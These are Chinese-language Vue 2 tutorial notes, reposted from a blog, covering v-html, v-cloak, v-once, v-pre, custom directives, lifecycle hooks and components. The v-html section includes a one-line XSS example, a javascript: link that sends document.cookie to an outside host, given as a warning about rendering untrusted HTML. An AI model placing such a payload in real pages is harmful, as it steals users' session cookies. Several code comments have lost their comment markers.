1.作用:向指定节点中渲染包含html结构的内容。
2.与插值语法的区别:
(1).v-html会替换掉节点中所有的内容,{{xx}}则不会。
(2).v-html可以识别html结构。
3.严重注意:v-html有安全性问题!!!!
(1).在网站上动态渲染任意HTML是非常危险的,容易导致XSS攻击。
(2).一定要在可信的内容上使用v-html,永不要用在用户提交的内容上!
准备好一个容器
<div id="root">
<div>你好,{{name}}</div>
<div v-html="str"></div>
<div v-html="str2"></div>
</div>
<script type="text/javascript">
Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
new Vue({
el:'#root',
data:{
name:'尚',
str:'<h3>你好啊!</h3>',
str2:'<a href=javascript:location.href=
"http://www.baidu.com?"+document.cookie>快来!</a>',
}
})
</script>
v-cloak指令(没有值)
<head>
<meta charset="UTF-8" />
<title>v-cloak指令</title>
<style>
[v-cloak]{
display:none;
}
</style>
<!-- 引入Vue -->
</head>
<body>
v-cloak指令(没有值):
1.本质是一个特殊属性,Vue实例创建完毕并接管容器后,会删掉v-cloak属性。
2.使用css配合v-cloak可以解决网速慢时页面展示出{{xxx}}的问题。
<!-- 准备好一个容器-->
<div id="root">
<h2 v-cloak>{{name}}</h2>
</div>
<script type="text/javascript"
src="http://localhost:8080/resource/5s/vue.js"></script>
</body>
<script type="text/javascript">
console.log(1)
Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
new Vue({
el:'#root',
data:{
name:'尚'
}
})
</script>
v-once指令:
1.v-once所在节点在初次动态渲染后,就视为静态内容了。
2.以后数据的改变不会引起v-once所在结构的更新,可以用于优化性能。
<!-- 准备好一个容器-->
<div id="root">
<h2 v-once>初始化的n值是:{{n}}</h2>
<h2>当前的n值是:{{n}}</h2>
<button @click="n++">点我n+1</button>
</div>
<script type="text/javascript">
Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
new Vue({
el:'#root',
data:{
n:1
}
})
</script>
v-pre指令:
1.跳过其所在节点的编译过程。
2.可利用它跳过:没有使用指令语法、没有使用插值语法的节点,会加快编译。
<!-- 准备好一个容器-->
<div id="root">
<h2 v-pre>Vue其实很简单</h2>
<h2 >当前的n值是:{{n}}</h2>
<button @click="n++">点我n+1</button>
</div>
</body>
<script type="text/javascript">
Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
new Vue({
el:'#root',
data:{
n:1
}
})
</script>
自定义指令
需求1:定义一个v-big指令,和v-text功能类似
但会把绑定的数值放大10倍。
需求2:定义一个v-fbind指令,和v-bind功能类似
但可以让其所绑定的input元素默认获取焦点。
自定义指令总结:
一、定义语法:
(1).局部指令:
new Vue({ new Vue({
directives:{指令名:配置对象} 或 directives{指令名:回调函数}
}) })
(2).全局指令:
Vue.directive(指令名,配置对象) 或 Vue.directive(指令名,回调函数)
二、配置对象中常用的3个回调:
(1).bind:指令与元素成功绑定时调用。
(2).inserted:指令所在元素被插入页面时调用。
(3).update:指令所在模板结构被重新解析时调用。
三、备注:
1.指令定义时不加v-,但使用时要加v-;
2.指令名如果是多个单词,要使用kebab-case命名方式,不要用camelCase命名。
<!-- 准备好一个容器-->
<div id="root">
<h2>{{name}}</h2>
<h2>当前的n值是:<span v-text="n"></span> </h2>
<h2>放大10倍后的n值是:<span v-big-number="n"></span> </h2>
<h2>放大10倍后的n值是:<span v-big="n"></span> </h2>
<button @click="n++">点我n+1</button>
<hr/>
<input type="text" v-fbind:value="n">
</div>
<script type="text/javascript">
Vue.config.productionTip = false
定义全局指令
Vue.directive('fbind',{
指令与元素成功绑定时(一上来)
bind(element,binding){
element.value = binding.value
},
指令所在元素被插入页面时
inserted(element,binding){
element.focus()
},
指令所在的模板被重新解析时
update(element,binding){
element.value = binding.value
}
})
new Vue({
el:'#root',
data:{
name:'尚',
n:1
},
directives:{
big函数何时会被调用?
1.指令与元素成功绑定时(一上来)
2.指令所在的模板被重新解析时
'big-number'(element,binding){
// console.log('big')
element.innerText = binding.value * 10
},
big(element,binding){
console.log('big',this) //注意此处的this是window
// console.log('big')
element.innerText = binding.value * 10
},
fbind:{
指令与元素成功绑定时(一上来)
bind(element,binding){
element.value = binding.value
},
指令所在元素被插入页面时
inserted(element,binding){
element.focus()
},
指令所在的模板被重新解析时
update(element,binding){
element.value = binding.value
}
}
}
})
</script>
生命周期函数
引出生命周期
生命周期:
1.又名:生命周期回调函数、生命周期函数、生命周期钩子。
2.是什么:Vue在关键时刻帮我们调用的一些特殊名称的函数。
3.生命周期函数的名字不可更改,但函数的具体内容是程序员根据需求编写的。
4.生命周期函数中的this指向是vm 或 组件实例对象。
准备好一个容器
<div id="root">
<h2 v-if="a">你好啊</h2>
<h2 :style="{opacity}">欢迎学习Vue</h2>
</div>
<script type="text/javascript">
Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
new Vue({
el:'#root',
data:{
a:false,
opacity:1
},
methods: {
},
Vue完成模板的解析并把初始的真实DOM元素放入页面后(挂载完毕)调用mounted
mounted(){
console.log('mounted',this)
setInterval(() => {
this.opacity -= 0.01
if(this.opacity <= 0) this.opacity = 1
},16)
},
})
通过外部的定时器实现(不推荐)
setInterval(() => {
vm.opacity -= 0.01
if(vm.opacity <= 0) vm.opacity = 1
},16)
</script>
常用的生命周期钩子:
1.mounted: 发送ajax请求、启动定时器、绑定自定义事件、订阅消息等【初始化操作】。
2.beforeDestroy: 清除定时器、解绑自定义事件、取消订阅消息等【收尾工作】。
关于销毁Vue实例
1.销毁后借助Vue开发者工具看不到任何信息。
2.销毁后自定义事件会失效,但原生DOM事件依然有效。
3.一般不会在beforeDestroy操作数据,因为即便操作数据,也不会再触发更新流程了。
准备好一个容器
<div id="root">
<h2 :style="{opacity}">欢迎学习Vue</h2>
<button @click="opacity = 1">透明度设置为1</button>
<button @click="stop">点我停止变换</button>
</div>
<script type="text/javascript">
Vue.config.productionTip = false //阻止 vue 在启动时生成生产提示。
new Vue({
el:'#root',
data:{
opacity:1
},
methods: {
stop(){
this.$destroy()
}
},
Vue完成模板的解析并把初始的真实DOM元素放入页面后(挂载完毕)调用mounted
mounted(){
console.log('mounted',this)
this.timer = setInterval(() => {
console.log('setInterval')
this.opacity -= 0.01
if(this.opacity <= 0) this.opacity = 1
},16)
},
beforeDestroy() {
clearInterval(this.timer)
console.log('vm即将驾鹤西游了')
},
})
</script>
非单文件组件
Vue中使用组件的三大步骤:
一、定义组件(创建组件)
二、注册组件
三、使用组件(写组件标签)
一、如何定义一个组件?
使用Vue.extend(options)创建,其中options和
new Vue(options)时传入的那个options几乎一样,但也有点区别;
1.el不要写,为什么?
最终所有的组件都要经过一个vm的管理,由vm中的el决定服务哪个容器。
2.data必须写成函数,为什么?
避免组件被复用时,数据存在引用关系。
备注:使用template可以配置组件结构。
二、如何注册组件?
1.局部注册:靠new Vue的时候传入components选项
2.全局注册:靠Vue.component('组件名',组件)
三、编写组件标签:
<school></school>
<!-- 准备好一个容器-->
<div id="root">
<hello></hello>
<hr>
<h1>{{msg}}</h1>
<hr>
第三步:编写组件标签
<school></school>
<hr>
第三步:编写组件标签
<student></student>
</div>
<div id="root2">
<hello></hello>
</div>
<script type="text/javascript">
Vue.config.productionTip = false
第一步:创建school组件
const school = Vue.extend({
template:`
<div class="demo">
<h2>学校名称:{{schoolName}}</h2>
<h2>学校地址:{{address}}</h2>
<button @click="showName">点我提示学校名</button>
</div>
`,
// el:'#root', //组件定义时,一定不要写el配置项
因为最终所有的组件都要被一个vm管理,由vm决定服务于哪个容器。
data(){
return {
schoolName:'尚',
address:'北京昌平'
}
},
methods: {
showName(){
alert(this.schoolName)
}
},
})
第一步:创建student组件
const student = Vue.extend({
template:`
<div>
<h2>学生姓名:{{studentName}}</h2>
<h2>学生年龄:{{age}}</h2>
</div>
`,
data(){
return {
studentName:'张三',
age:18
}
}
})
第一步:创建hello组件
const hello = Vue.extend({
template:`
<div>
<h2>你好啊!{{name}}</h2>
</div>
`,
data(){
return {
name:'Tom'
}
}
})
第二步:全局注册组件
Vue.component('hello',hello)
创建vm
new Vue({
el:'#root',
data:{
msg:'你好啊!'
},
第二步:注册组件(局部注册)
components:{
school,
student
}
})
new Vue({
el:'#root2',
})
</script>
几个注意点:
1.关于组件名:
一个单词组成:
第一种写法(首字母小写):school
第二种写法(首字母大写):School
多个单词组成:
第一种写法(kebab-case命名):my-school
第二种写法(CamelCase命名):MySchool (需要Vue脚手架支持)
备注:
(1).组件名尽可能回避HTML中已有的元素名称,例如:h2、H2都不行。
(2).可以使用name配置项指定组件在开发者工具中呈现的名字。
2.关于组件标签:
第一种写法:<school></school>
第二种写法:<school/>
备注:不用使用脚手架时,<school/>会导致后续组件不能渲染。
3.一个简写方式:
const school = Vue.extend(options) 可简写为:const school = options
组件嵌套
const student = Vue.extend({
name:'student',
template:`
<div>
<h2>学生姓名:{{name}}</h2>
<h2>学生年龄:{{age}}</h2>
</div>
`,
data(){
return {
name:'尚',
age:18
}
}
})
定义school组件
const school = Vue.extend({
name:'school',
template:`
<div>
<h2>学校名称:{{name}}</h2>
<h2>学校地址:{{address}}</h2>
<student></student>
</div>
`,
data(){
return {
name:'尚',
address:'北京'
}
},
注册组件(局部)
components:{
student
}
})
定义hello组件
const hello = Vue.extend({
template:`<h1>{{msg}}</h1>`,
data(){
return {
msg:'欢迎尚!'
}
}
})
定义app组件
const app = Vue.extend({
template:`
<div>
<hello></hello>
<school></school>
</div>
`,
components:{
school,
hello
}
})
创建vm
new Vue({
template:'<app></app>',
el:'#root',
//注册组件(局部)
components:{app}
})
关于VueComponent:
1.school组件本质是一个名为VueComponent的构造函数
且不是程序员定义的,是Vue.extend生成的。
2.我们只需要写<school/>或<school></school>
Vue解析时会帮我们创建school组件的实例对象
即Vue帮我们执行的:new VueComponent(options)。
3.特别注意:每次调用Vue.extend,返回的都是一个全新的VueComponent
4.关于this指向:
(1).组件配置中:
data函数、methods中的函数、watch中的函数
computed中的函数 它们的this均是【VueComponent实例对象】。
(2).new Vue(options)配置中:
data函数、methods中的函数、watch中的函数
computed中的函数 它们的this均是【Vue实例对象】。
5.VueComponent的实例对象,以后简称vc(也可称之为:组件实例对象)。
Vue的实例对象,以后简称vm。
1. 一个重要的内置关系:VueComponent.prototype.__proto__ === Vue.prototype
2.为什么要有这个关系:让组件实例对象(vc)可以访问到 Vue原型上的属性、方法。
单文件组件
School.vue
<template>
template 里写结构
<div>
<h2>学校名称:{{name}}</h2>
<h2>学校地址:{{address}}</h2>
</div>
</template>
<script>
写脚本
export default {
组件名称
name:"School",
数据对应结构
data(){
return {
name :"尚",
address:'北京'
}
}
}
</script>
App.vue
<template>
<div>
编写组件标签
<School></School>
<Student></Student>
</div>
</template>
<script>
import School from 'School.vue' //引入组件
import Student from 'Student.vue'
export default {
name:"App",
components: { School, Student },// 注册组件
}
</script>
Main.js
import App from 'App.vue' //引入App
创建vue实例 并指定为root容器服务
new Vue({
el:'root',
结构
template:`
<App></App>
`,
components:{
App //注册App
}
})
html文件 需在脚手架中使用
<body>
<div class="root"></div>
<script src="../js/vue.js"></script>
<script src="main.js"></script>
</body>
本文转载自: https://blog.csdn.net/weixin_58614421/article/details/123850580
版权归原作者 爱笑的满月 所有, 如有侵权,请联系我们删除。
版权归原作者 爱笑的满月 所有, 如有侵权,请联系我们删除。